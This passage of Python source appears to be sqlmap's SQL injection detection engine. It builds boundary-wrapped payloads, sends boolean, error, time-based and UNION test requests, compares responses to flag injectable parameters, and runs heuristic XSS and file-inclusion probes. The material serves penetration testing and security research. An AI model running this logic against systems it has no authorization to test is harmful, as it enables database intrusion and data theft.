injectable = False\n\n # Skip boundary if the level is higher than the provided (or\n # default) value\n # Parse boundary's <level>\n if boundary.level > conf.level and not (kb.extendTests and intersect(payloadDbms, kb.extendTests, True)):\n continue\n\n # Skip boundary if it does not match against test's <clause>\n # Parse test's <clause> and boundary's <clause>\n clauseMatch = False\n\n for clauseTest in test.clause:\n if clauseTest in boundary.clause:\n clauseMatch = True\n break\n\n if test.clause != [0] and boundary.clause != [0] and not clauseMatch:\n continue\n\n # Skip boundary if it does not match against test's <where>\n # Parse test's <where> and boundary's <where>\n whereMatch = False\n\n for where in test.where:\n if where in boundary.where:\n whereMatch = True\n break\n\n if not whereMatch:\n continue\n\n # Parse boundary's <prefix>, <suffix> and <ptype>\n prefix = boundary.prefix or \"\"\n suffix = boundary.suffix or \"\"\n ptype = boundary.ptype\n\n # Options --prefix/--suffix have a higher priority (if set by user)\n prefix = conf.prefix if conf.prefix is not None else prefix\n suffix = conf.suffix if conf.suffix is not None else suffix\n comment = None if conf.suffix is not None else comment\n\n # If the previous injections succeeded, we know which prefix,\n # suffix and parameter type to use for further tests, no\n # need to cycle through the boundaries for the following tests\n condBound = (injection.prefix is not None and injection.suffix is not None)\n condBound &= (injection.prefix != prefix or injection.suffix != suffix)\n condType = injection.ptype is not None and injection.ptype != ptype\n\n # If the payload is an inline query test for it regardless\n # of previously identified injection 
types\n if stype != PAYLOAD.TECHNIQUE.QUERY and (condBound or condType):\n continue\n\n # For each test's <where>\n for where in test.where:\n templatePayload = None\n vector = None\n\n origValue = value\n if kb.customInjectionMark in origValue:\n origValue = origValue.split(kb.customInjectionMark)[0]\n origValue = re.search(r\"(\\w*)\\Z\", origValue).group(1)\n\n # Treat the parameter original value according to the\n # test's <where> tag\n if where == PAYLOAD.WHERE.ORIGINAL or conf.prefix:\n if kb.tamperFunctions:\n templatePayload = agent.payload(place, parameter, value=\"\", newValue=origValue, where=where)\n elif where == PAYLOAD.WHERE.NEGATIVE:\n # Use different page template than the original\n # one as we are changing parameters value, which\n # will likely result in a different content\n\n if conf.invalidLogical:\n _ = int(kb.data.randomInt[:2])\n origValue = \"%s AND %s LIKE %s\" % (origValue, _, _ + 1)\n elif conf.invalidBignum:\n origValue = kb.data.randomInt[:6]\n elif conf.invalidString:\n origValue = kb.data.randomStr[:6]\n else:\n origValue = \"-%s\" % kb.data.randomInt[:4]\n\n templatePayload = agent.payload(place, parameter, value=\"\", newValue=origValue, where=where)\n elif where == PAYLOAD.WHERE.REPLACE:\n origValue = \"\"\n\n kb.pageTemplate, kb.errorIsNone = getPageTemplate(templatePayload, place)\n\n # Forge request payload by prepending with boundary's\n # prefix and appending the boundary's suffix to the\n # test's ' <payload><comment> ' string\n if fstPayload:\n boundPayload = agent.prefixQuery(fstPayload, prefix, where, clause)\n boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)\n reqPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)\n\n if reqPayload:\n stripPayload = re.sub(r\"(\\A|\\b|_)([A-Za-z]{4}((?<!LIKE))|\\d+)(_|\\b|\\Z)\", r\"\\g<1>.\\g<4>\", reqPayload)\n if stripPayload in seenPayload:\n continue\n else:\n seenPayload.add(stripPayload)\n else:\n reqPayload = None\n\n # Perform the test's request and check whether or not the\n # payload was successful\n # Parse test's <response>\n for method, check in test.response.items():\n check = agent.cleanupPayload(check, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or \"\") else None)\n\n # In case of boolean-based blind SQL injection\n if method == PAYLOAD.METHOD.COMPARISON:\n # Generate payload used for comparison\n def genCmpPayload():\n sndPayload = agent.cleanupPayload(test.response.comparison, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or \"\") else None)\n\n # Forge response payload by prepending with\n # boundary's prefix and appending the boundary's\n # suffix to the test's ' <payload><comment> '\n # string\n boundPayload = agent.prefixQuery(sndPayload, prefix, where, clause)\n boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)\n cmpPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)\n\n return cmpPayload\n\n # Useful to set kb.matchRatio at first based on False response content\n kb.matchRatio = None\n kb.negativeLogic = (where == PAYLOAD.WHERE.NEGATIVE)\n suggestion = None\n Request.queryPage(genCmpPayload(), place, raise404=False)\n falsePage, falseHeaders, falseCode = threadData.lastComparisonPage or \"\", threadData.lastComparisonHeaders, threadData.lastComparisonCode\n falseRawResponse = \"%s%s\" % (falseHeaders, falsePage)\n\n # Checking if there is difference between current FALSE, original and heuristics page (i.e. 
not used parameter)\n if not any((kb.negativeLogic, conf.string, conf.notString, conf.code)):\n try:\n ratio = 1.0\n seqMatcher = getCurrentThreadData().seqMatcher\n\n for current in (kb.originalPage, kb.heuristicPage):\n seqMatcher.set_seq1(current or \"\")\n seqMatcher.set_seq2(falsePage or \"\")\n ratio *= seqMatcher.quick_ratio()\n\n if ratio == 1.0:\n continue\n except (MemoryError, OverflowError):\n pass\n\n # Perform the test's True request\n trueResult = Request.queryPage(reqPayload, place, raise404=False)\n truePage, trueHeaders, trueCode = threadData.lastComparisonPage or \"\", threadData.lastComparisonHeaders, threadData.lastComparisonCode\n trueRawResponse = \"%s%s\" % (trueHeaders, truePage)\n\n if trueResult and not(truePage == falsePage and not any((kb.nullConnection, conf.code))):\n # Perform the test's False request\n falseResult = Request.queryPage(genCmpPayload(), place, raise404=False)\n\n if not falseResult:\n if kb.negativeLogic:\n boundPayload = agent.prefixQuery(kb.data.randomStr, prefix, where, clause)\n boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)\n errorPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)\n\n errorResult = Request.queryPage(errorPayload, place, raise404=False)\n if errorResult:\n continue\n elif kb.heuristicPage and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):\n _ = comparison(kb.heuristicPage, None, getRatioValue=True)\n if (_ or 0) > (kb.matchRatio or 0):\n kb.matchRatio = _\n logger.debug(\"adjusting match ratio for current parameter to %.3f\" % kb.matchRatio)\n\n # Reducing false-positive \"appears\" messages in heavily dynamic environment\n if kb.heavilyDynamic and not Request.queryPage(reqPayload, place, raise404=False):\n continue\n\n injectable = True\n\n elif (threadData.lastComparisonRatio or 0) > UPPER_RATIO_BOUND and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):\n originalSet = set(getFilteredPageContent(kb.pageTemplate, True, \"\\n\").split(\"\\n\"))\n trueSet = set(getFilteredPageContent(truePage, True, \"\\n\").split(\"\\n\"))\n falseSet = set(getFilteredPageContent(falsePage, True, \"\\n\").split(\"\\n\"))\n\n if threadData.lastErrorPage and threadData.lastErrorPage[1]:\n errorSet = set(getFilteredPageContent(threadData.lastErrorPage[1], True, \"\\n\").split(\"\\n\"))\n else:\n errorSet = set()\n\n if originalSet == trueSet != falseSet:\n candidates = trueSet - falseSet - errorSet\n\n if candidates:\n candidates = sorted(candidates, key=len)\n for candidate in candidates:\n if re.match(r\"\\A[\\w.,! 
]+\\Z\", candidate) and ' ' in candidate and candidate.strip() and len(candidate) > CANDIDATE_SENTENCE_MIN_LENGTH:\n suggestion = conf.string = candidate\n injectable = True\n\n infoMsg = \"%sparameter '%s' appears to be '%s' injectable (with --string=\\\"%s\\\")\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter, title, repr(conf.string).lstrip('u').strip(\"'\"))\n logger.info(infoMsg)\n\n break\n\n if injectable:\n if kb.pageStable and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):\n if all((falseCode, trueCode)) and falseCode != trueCode:\n suggestion = conf.code = trueCode\n\n infoMsg = \"%sparameter '%s' appears to be '%s' injectable (with --code=%d)\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter, title, conf.code)\n logger.info(infoMsg)\n else:\n trueSet = set(extractTextTagContent(trueRawResponse))\n trueSet |= set(__ for _ in trueSet for __ in _.split())\n\n falseSet = set(extractTextTagContent(falseRawResponse))\n falseSet |= set(__ for _ in falseSet for __ in _.split())\n\n if threadData.lastErrorPage and threadData.lastErrorPage[1]:\n errorSet = set(extractTextTagContent(threadData.lastErrorPage[1]))\n errorSet |= set(__ for _ in errorSet for __ in _.split())\n else:\n errorSet = set()\n\n candidates = filterNone(_.strip() if _.strip() in trueRawResponse and _.strip() not in falseRawResponse else None for _ in (trueSet - falseSet - errorSet))\n\n if candidates:\n candidates = sorted(candidates, key=len)\n for candidate in candidates:\n if re.match(r\"\\A\\w{2,}\\Z\", candidate): # Note: length of 1 (e.g. --string=5) could cause trouble, especially in error message pages with partially reflected payload content\n break\n\n suggestion = conf.string = candidate\n\n infoMsg = \"%sparameter '%s' appears to be '%s' injectable (with --string=\\\"%s\\\")\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter, title, repr(conf.string).lstrip('u').strip(\"'\"))\n logger.info(infoMsg)\n\n if not any((conf.string, conf.notString)):\n candidates = filterNone(_.strip() if _.strip() in falseRawResponse and _.strip() not in trueRawResponse else None for _ in (falseSet - trueSet))\n\n if candidates:\n candidates = sorted(candidates, key=len)\n for candidate in candidates:\n if re.match(r\"\\A\\w+\\Z\", candidate):\n break\n\n suggestion = conf.notString = candidate\n\n infoMsg = \"%sparameter '%s' appears to be '%s' injectable (with --not-string=\\\"%s\\\")\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter, title, repr(conf.notString).lstrip('u').strip(\"'\"))\n logger.info(infoMsg)\n\n if not suggestion:\n infoMsg = \"%sparameter '%s' appears to be '%s' injectable \" % (\"%s \" % paramType if paramType != parameter else \"\", parameter, title)\n singleTimeLogMessage(infoMsg)\n\n # In case of error-based SQL injection\n elif method == PAYLOAD.METHOD.GREP:\n # Perform the test's request and grep the response\n # body for the test's regular expression\n try:\n page, headers, _ = Request.queryPage(reqPayload, place, content=True, raise404=False)\n output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE)\n output = output or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE)\n output = output or extractRegexResult(check, listToStrValue((headers[key] for key in headers if key.lower() != URI_HTTP_HEADER.lower()) if headers else None), re.DOTALL | re.IGNORECASE)\n output = output or 
extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)\n\n if output:\n result = output == '1'\n\n if result:\n infoMsg = \"%sparameter '%s' is '%s' injectable \" % (\"%s \" % paramType if paramType != parameter else \"\", parameter, title)\n logger.info(infoMsg)\n\n injectable = True\n\n except SqlmapConnectionException as ex:\n debugMsg = \"problem occurred most likely because the \"\n debugMsg += \"server hasn't recovered as expected from the \"\n debugMsg += \"used error-based payload ('%s')\" % getSafeExString(ex)\n logger.debug(debugMsg)\n\n # In case of time-based blind or stacked queries\n # SQL injections\n elif method == PAYLOAD.METHOD.TIME:\n # Perform the test's request\n trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)\n trueCode = threadData.lastCode\n\n if trueResult:\n # Extra validation step (e.g. to check for DROP protection mechanisms)\n if SLEEP_TIME_MARKER in reqPayload:\n falseResult = Request.queryPage(reqPayload.replace(SLEEP_TIME_MARKER, \"0\"), place, timeBasedCompare=True, raise404=False)\n if falseResult:\n continue\n\n # Confirm test's results\n trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)\n\n if trueResult:\n infoMsg = \"%sparameter '%s' appears to be '%s' injectable \" % (\"%s \" % paramType if paramType != parameter else \"\", parameter, title)\n logger.info(infoMsg)\n\n injectable = True\n\n # In case of UNION query SQL injection\n elif method == PAYLOAD.METHOD.UNION:\n # Test for UNION injection and set the sample\n # payload as well as the vector.\n # NOTE: vector is set to a tuple with 6 elements,\n # used afterwards by Agent.forgeUnionQuery()\n # method to forge the UNION query payload\n\n configUnion(test.request.char, test.request.columns)\n\n if len(kb.dbmsFilter or []) == 1:\n Backend.forceDbms(kb.dbmsFilter[0])\n elif not Backend.getIdentifiedDbms():\n if kb.heuristicDbms is None:\n if kb.heuristicTest == HEURISTIC_TEST.POSITIVE or injection.data:\n warnMsg = \"using unescaped version of the test \"\n warnMsg += \"because of zero knowledge of the \"\n warnMsg += \"back-end DBMS. 
You can try to \"\n warnMsg += \"explicitly set it with option '--dbms'\"\n singleTimeWarnMessage(warnMsg)\n else:\n Backend.forceDbms(kb.heuristicDbms)\n\n if unionExtended:\n infoMsg = \"automatically extending ranges for UNION \"\n infoMsg += \"query injection technique tests as \"\n infoMsg += \"there is at least one other (potential) \"\n infoMsg += \"technique found\"\n singleTimeLogMessage(infoMsg)\n\n # Test for UNION query SQL injection\n reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix)\n\n if isinstance(reqPayload, six.string_types):\n infoMsg = \"%sparameter '%s' is '%s' injectable\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter, title)\n logger.info(infoMsg)\n\n injectable = True\n\n # Overwrite 'where' because it can be set\n # by unionTest() directly\n where = vector[6]\n\n kb.previousMethod = method\n\n if conf.offline:\n injectable = False\n\n # If the injection test was successful feed the injection\n # object with the test's details\n if injectable is True:\n # Feed with the boundaries details only the first time a\n # test has been successful\n if injection.place is None or injection.parameter is None:\n if place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):\n injection.parameter = place\n else:\n injection.parameter = parameter\n\n injection.place = place\n injection.ptype = ptype\n injection.prefix = prefix\n injection.suffix = suffix\n injection.clause = clause\n\n # Feed with test details every time a test is successful\n if hasattr(test, \"details\"):\n for key, value in test.details.items():\n if key == \"dbms\":\n injection.dbms = value\n\n if not isinstance(value, list):\n Backend.setDbms(value)\n else:\n Backend.forceDbms(value[0], True)\n\n elif key == \"dbms_version\" and injection.dbms_version is None and not conf.testFilter:\n injection.dbms_version = Backend.setVersion(value)\n\n elif key == \"os\" and injection.os is None:\n injection.os = Backend.setOs(value)\n\n if vector is None and \"vector\" in test and test.vector is not None:\n vector = test.vector\n\n injection.data[stype] = AttribDict()\n injection.data[stype].title = title\n injection.data[stype].payload = agent.removePayloadDelimiters(reqPayload)\n injection.data[stype].where = where\n injection.data[stype].vector = vector\n injection.data[stype].comment = comment\n injection.data[stype].templatePayload = templatePayload\n injection.data[stype].matchRatio = kb.matchRatio\n injection.data[stype].trueCode = trueCode\n injection.data[stype].falseCode = falseCode\n\n injection.conf.textOnly = conf.textOnly\n injection.conf.titles = conf.titles\n injection.conf.code = conf.code\n injection.conf.string = conf.string\n injection.conf.notString = conf.notString\n injection.conf.regexp = conf.regexp\n injection.conf.optimize = conf.optimize\n\n if conf.beep:\n beep()\n\n # There is no need to perform this test for other\n # tags\n break\n\n if injectable is True:\n kb.vulnHosts.add(conf.hostname)\n break\n\n # Reset forced back-end DBMS value\n Backend.flushForcedDbms()\n\n except KeyboardInterrupt:\n warnMsg = \"user aborted during detection phase\"\n logger.warning(warnMsg)\n\n if conf.multipleTargets:\n msg = \"how do you want to proceed? [ne(X)t target/(s)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]\"\n choice = readInput(msg, default='X', checkBatch=False).upper()\n else:\n msg = \"how do you want to proceed? 
[(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]\"\n choice = readInput(msg, default='S', checkBatch=False).upper()\n\n if choice == 'X':\n if conf.multipleTargets:\n raise SqlmapSkipTargetException\n elif choice == 'C':\n choice = None\n while not ((choice or \"\").isdigit() and 0 <= int(choice) <= 6):\n if choice:\n logger.warning(\"invalid value\")\n msg = \"enter new verbosity level: [0-6] \"\n choice = readInput(msg, default=str(conf.verbose), checkBatch=False)\n conf.verbose = int(choice)\n setVerbosity()\n if hasattr(test.request, \"columns\") and hasattr(test.request, \"_columns\"):\n test.request.columns = test.request._columns\n delattr(test.request, \"_columns\")\n tests.insert(0, test)\n elif choice == 'N':\n return None\n elif choice == 'E':\n kb.endDetection = True\n elif choice == 'Q':\n raise SqlmapUserQuitException\n\n finally:\n # Reset forced back-end DBMS value\n Backend.flushForcedDbms()\n\n Backend.flushForcedDbms(True)\n\n # Return the injection object\n if injection.place is not None and injection.parameter is not None:\n if not conf.dropSetCookie and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data and injection.data[PAYLOAD.TECHNIQUE.BOOLEAN].vector.startswith('OR'):\n warnMsg = \"in OR boolean-based injection cases, please consider usage \"\n warnMsg += \"of switch '--drop-set-cookie' if you experience any \"\n warnMsg += \"problems during data retrieval\"\n logger.warning(warnMsg)\n\n if not checkFalsePositives(injection):\n if conf.hostname in kb.vulnHosts:\n kb.vulnHosts.remove(conf.hostname)\n if NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE not in injection.notes:\n injection.notes.append(NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE)\n else:\n injection = None\n\n if injection and NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE not in injection.notes:\n checkSuhosinPatch(injection)\n checkFilteredChars(injection)\n\n return injection\n\n@stackedmethod\ndef heuristicCheckDbms(injection):\n \"\"\"\n This functions is called when boolean-based blind is identified with a\n generic payload and the DBMS has not yet been fingerprinted to attempt\n to identify with a simple DBMS specific boolean-based test what the DBMS\n may be\n \"\"\"\n\n retVal = False\n\n if conf.skipHeuristics:\n return retVal\n\n pushValue(kb.injection)\n kb.injection = injection\n\n for dbms in getPublicTypeMembers(DBMS, True):\n randStr1, randStr2 = randomStr(), randomStr()\n\n Backend.forceDbms(dbms)\n\n if dbms in HEURISTIC_NULL_EVAL:\n result = checkBooleanExpression(\"(SELECT %s%s) IS NULL\" % (HEURISTIC_NULL_EVAL[dbms], FROM_DUMMY_TABLE.get(dbms, \"\")))\n elif not ((randStr1 in unescaper.escape(\"'%s'\" % randStr1)) and list(FROM_DUMMY_TABLE.values()).count(FROM_DUMMY_TABLE.get(dbms, \"\")) != 1):\n result = checkBooleanExpression(\"(SELECT '%s'%s)=%s%s%s\" % (randStr1, FROM_DUMMY_TABLE.get(dbms, \"\"), SINGLE_QUOTE_MARKER, randStr1, SINGLE_QUOTE_MARKER))\n else:\n result = False\n\n if result:\n if not checkBooleanExpression(\"(SELECT '%s'%s)=%s%s%s\" % (randStr1, FROM_DUMMY_TABLE.get(dbms, \"\"), SINGLE_QUOTE_MARKER, randStr2, SINGLE_QUOTE_MARKER)):\n retVal = dbms\n break\n\n Backend.flushForcedDbms()\n kb.injection = popValue()\n\n if retVal:\n infoMsg = \"heuristic (extended) test shows that the back-end DBMS \" # Not as important as \"parsing\" counter-part (because of false-positives)\n infoMsg += \"could be '%s' \" % retVal\n logger.info(infoMsg)\n\n kb.heuristicExtendedDbms = retVal\n\n return retVal\n\n@stackedmethod\ndef checkFalsePositives(injection):\n \"\"\"\n 
Checks for false positives (only in single special cases)\n \"\"\"\n\n retVal = True\n\n if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or (len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and \"Generic\" in injection.data[PAYLOAD.TECHNIQUE.UNION].title):\n pushValue(kb.injection)\n\n infoMsg = \"checking if the injection point on %s \" % injection.place\n infoMsg += \"parameter '%s' is a false positive\" % injection.parameter\n logger.info(infoMsg)\n\n def _():\n return int(randomInt(2)) + 1\n\n kb.injection = injection\n\n for level in xrange(conf.level):\n while True:\n randInt1, randInt2, randInt3 = (_() for j in xrange(3))\n\n randInt1 = min(randInt1, randInt2, randInt3)\n randInt3 = max(randInt1, randInt2, randInt3)\n\n if conf.string and any(conf.string in getUnicode(_) for _ in (randInt1, randInt2, randInt3)):\n continue\n\n if conf.notString and any(conf.notString in getUnicode(_) for _ in (randInt1, randInt2, randInt3)):\n continue\n\n if randInt3 > randInt2 > randInt1:\n break\n\n if not checkBooleanExpression(\"%d%s%d\" % (randInt1, INFERENCE_EQUALS_CHAR, randInt1)):\n retVal = False\n break\n\n if PAYLOAD.TECHNIQUE.BOOLEAN not in injection.data:\n checkBooleanExpression(\"%d%s%d\" % (randInt1, INFERENCE_EQUALS_CHAR, randInt2)) # just in case if DBMS hasn't properly recovered from previous delayed request\n\n if checkBooleanExpression(\"%d%s%d\" % (randInt1, INFERENCE_EQUALS_CHAR, randInt3)): # this must not be evaluated to True\n retVal = False\n break\n\n elif checkBooleanExpression(\"%d%s%d\" % (randInt3, INFERENCE_EQUALS_CHAR, randInt2)): # this must not be evaluated to True\n retVal = False\n break\n\n elif not checkBooleanExpression(\"%d%s%d\" % (randInt2, INFERENCE_EQUALS_CHAR, randInt2)): # this must be evaluated to True\n retVal = False\n break\n\n elif checkBooleanExpression(\"%d %d\" % (randInt3, randInt2)): # this must not be evaluated to True (invalid statement)\n retVal = False\n break\n\n if not retVal:\n warnMsg = \"false positive or unexploitable injection point detected\"\n logger.warning(warnMsg)\n\n kb.injection = popValue()\n\n return retVal\n\n@stackedmethod\ndef checkSuhosinPatch(injection):\n \"\"\"\n Checks for existence of Suhosin-patch (and alike) protection mechanism(s)\n \"\"\"\n\n if injection.place in (PLACE.GET, PLACE.URI):\n debugMsg = \"checking for parameter length \"\n debugMsg += \"constraining mechanisms\"\n logger.debug(debugMsg)\n\n pushValue(kb.injection)\n\n kb.injection = injection\n randInt = randomInt()\n\n if not checkBooleanExpression(\"%d=%s%d\" % (randInt, ' ' * SUHOSIN_MAX_VALUE_LENGTH, randInt)):\n warnMsg = \"parameter length constraining \"\n warnMsg += \"mechanism detected (e.g. Suhosin patch). \"\n warnMsg += \"Potential problems in enumeration phase can be expected\"\n logger.warning(warnMsg)\n\n kb.injection = popValue()\n\n@stackedmethod\ndef checkFilteredChars(injection):\n debugMsg = \"checking for filtered characters\"\n logger.debug(debugMsg)\n\n pushValue(kb.injection)\n\n kb.injection = injection\n randInt = randomInt()\n\n # all other techniques are already using parentheses in tests\n if len(injection.data) == 1 and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data:\n if not checkBooleanExpression(\"(%d)=%d\" % (randInt, randInt)):\n warnMsg = \"it appears that some non-alphanumeric characters (i.e. ()) are \"\n warnMsg += \"filtered by the back-end server. 
There is a strong \"\n warnMsg += \"possibility that sqlmap won't be able to properly \"\n warnMsg += \"exploit this vulnerability\"\n logger.warning(warnMsg)\n\n # inference techniques depend on character '>'\n if not any(_ in injection.data for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.QUERY)):\n if not checkBooleanExpression(\"%d>%d\" % (randInt + 1, randInt)):\n warnMsg = \"it appears that the character '>' is \"\n warnMsg += \"filtered by the back-end server. You are strongly \"\n warnMsg += \"advised to rerun with the '--tamper=between'\"\n logger.warning(warnMsg)\n\n kb.injection = popValue()\n\ndef heuristicCheckSqlInjection(place, parameter):\n if conf.skipHeuristics:\n return None\n\n origValue = conf.paramDict[place][parameter]\n paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place\n\n prefix = \"\"\n suffix = \"\"\n randStr = \"\"\n\n if conf.prefix or conf.suffix:\n if conf.prefix:\n prefix = conf.prefix\n\n if conf.suffix:\n suffix = conf.suffix\n\n while randStr.count('\\'') != 1 or randStr.count('\\\"') != 1:\n randStr = randomStr(length=10, alphabet=HEURISTIC_CHECK_ALPHABET)\n\n kb.heuristicMode = True\n\n payload = \"%s%s%s\" % (prefix, randStr, suffix)\n payload = agent.payload(place, parameter, newValue=payload)\n page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)\n\n kb.heuristicPage = page\n kb.heuristicMode = False\n\n parseFilePaths(page)\n result = wasLastResponseDBMSError()\n\n infoMsg = \"heuristic (basic) test shows that %sparameter '%s' might \" % (\"%s \" % paramType if paramType != parameter else \"\", parameter)\n\n def _(page):\n return any(_ in (page or \"\") for _ in FORMAT_EXCEPTION_STRINGS)\n\n casting = _(page) and not _(kb.originalPage)\n\n if not casting and not result and kb.dynamicParameter and origValue.isdigit() and not kb.heavilyDynamic:\n randInt = int(randomInt())\n payload = \"%s%s%s\" % (prefix, \"%d-%d\" % (int(origValue) + randInt, randInt), suffix)\n payload = agent.payload(place, parameter, newValue=payload, where=PAYLOAD.WHERE.REPLACE)\n result = Request.queryPage(payload, place, raise404=False)\n\n if not result:\n randStr = randomStr()\n payload = \"%s%s%s\" % (prefix, \"%s.%d%s\" % (origValue, random.randint(1, 9), randStr), suffix)\n payload = agent.payload(place, parameter, newValue=payload, where=PAYLOAD.WHERE.REPLACE)\n casting = Request.queryPage(payload, place, raise404=False)\n\n kb.heuristicTest = HEURISTIC_TEST.CASTED if casting else HEURISTIC_TEST.NEGATIVE if not result else HEURISTIC_TEST.POSITIVE\n\n if kb.heavilyDynamic:\n debugMsg = \"heuristic check stopped because of heavy dynamicity\"\n logger.debug(debugMsg)\n return kb.heuristicTest\n\n if casting:\n errMsg = \"possible %s casting detected (e.g. 
'\" % (\"integer\" if origValue.isdigit() else \"type\")\n\n platform = conf.url.split('.')[-1].lower()\n if platform == WEB_PLATFORM.ASP:\n errMsg += \"%s=CInt(request.querystring(\\\"%s\\\"))\" % (parameter, parameter)\n elif platform == WEB_PLATFORM.ASPX:\n errMsg += \"int.TryParse(Request.QueryString[\\\"%s\\\"], out %s)\" % (parameter, parameter)\n elif platform == WEB_PLATFORM.JSP:\n errMsg += \"%s=Integer.parseInt(request.getParameter(\\\"%s\\\"))\" % (parameter, parameter)\n else:\n errMsg += \"$%s=intval($_REQUEST[\\\"%s\\\"])\" % (parameter, parameter)\n\n errMsg += \"') at the back-end web application\"\n logger.error(errMsg)\n\n if kb.ignoreCasted is None:\n message = \"do you want to skip those kind of cases (and save scanning time)? %s \" % (\"[Y/n]\" if conf.multipleTargets else \"[y/N]\")\n kb.ignoreCasted = readInput(message, default='Y' if conf.multipleTargets else 'N', boolean=True)\n\n elif result:\n infoMsg += \"be injectable\"\n if Backend.getErrorParsedDBMSes():\n infoMsg += \" (possible DBMS: '%s')\" % Format.getErrorParsedDBMSes()\n logger.info(infoMsg)\n\n else:\n infoMsg += \"not be injectable\"\n logger.warning(infoMsg)\n\n kb.heuristicMode = True\n kb.disableHtmlDecoding = True\n\n randStr1, randStr2 = randomStr(NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH), randomStr(NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH)\n value = \"%s%s%s\" % (randStr1, DUMMY_NON_SQLI_CHECK_APPENDIX, randStr2)\n payload = \"%s%s%s\" % (prefix, \"'%s\" % value, suffix)\n payload = agent.payload(place, parameter, newValue=payload)\n page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)\n\n paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place\n\n # Reference: https://bugs.python.org/issue18183\n if value.upper() in (page or \"\").upper():\n infoMsg = \"heuristic (XSS) test shows that %sparameter '%s' might be vulnerable to cross-site scripting (XSS) attacks\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter)\n logger.info(infoMsg)\n\n if conf.beep:\n beep()\n\n for match in re.finditer(FI_ERROR_REGEX, page or \"\"):\n if randStr1.lower() in match.group(0).lower():\n infoMsg = \"heuristic (FI) test shows that %sparameter '%s' might be vulnerable to file inclusion (FI) attacks\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter)\n logger.info(infoMsg)\n\n if conf.beep:\n beep()\n\n break\n\n kb.disableHtmlDecoding = False\n kb.heuristicMode = False\n\n return kb.heuristicTest\n\ndef checkDynParam(place, parameter, value):\n \"\"\"\n This function checks if the URL parameter is dynamic. 
If it is\n dynamic, the content of the page differs, otherwise the\n dynamicity might depend on another parameter.\n \"\"\"\n\n if kb.choices.redirect:\n return None\n\n kb.matchRatio = None\n dynResult = None\n randInt = randomInt()\n\n paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place\n\n infoMsg = \"testing if %sparameter '%s' is dynamic\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter)\n logger.info(infoMsg)\n\n try:\n payload = agent.payload(place, parameter, value, getUnicode(randInt))\n dynResult = Request.queryPage(payload, place, raise404=False)\n except SqlmapConnectionException:\n pass\n\n result = None if dynResult is None else not dynResult\n kb.dynamicParameter = result\n\n return result\n\ndef checkDynamicContent(firstPage, secondPage):\n \"\"\"\n This function checks for the dynamic content in the provided pages\n \"\"\"\n\n if kb.nullConnection:\n debugMsg = \"dynamic content checking skipped \"\n debugMsg += \"because NULL connection used\"\n logger.debug(debugMsg)\n return\n\n if any(page is None for page in (firstPage, secondPage)):\n warnMsg = \"can't check dynamic content \"\n warnMsg += \"because of lack of page content\"\n logger.critical(warnMsg)\n return\n\n if firstPage and secondPage and any(len(_) > MAX_DIFFLIB_SEQUENCE_LENGTH for _ in (firstPage, secondPage)):\n ratio = None\n else:\n try:\n seqMatcher = getCurrentThreadData().seqMatcher\n seqMatcher.set_seq1(firstPage)\n seqMatcher.set_seq2(secondPage)\n ratio = seqMatcher.quick_ratio()\n except MemoryError:\n ratio = None\n\n if ratio is None:\n kb.skipSeqMatcher = True\n\n # In case of an intolerable difference turn on dynamicity removal engine\n elif ratio <= UPPER_RATIO_BOUND:\n findDynamicContent(firstPage, secondPage)\n\n count = 0\n while not Request.queryPage():\n count += 1\n\n if count > conf.retries:\n warnMsg = \"target URL content appears to be too dynamic. \"\n warnMsg += \"Switching to '--text-only' \"\n logger.warning(warnMsg)\n\n conf.textOnly = True\n return\n\n warnMsg = \"target URL content appears to be heavily dynamic. \"\n warnMsg += \"sqlmap is going to retry the request(s)\"\n 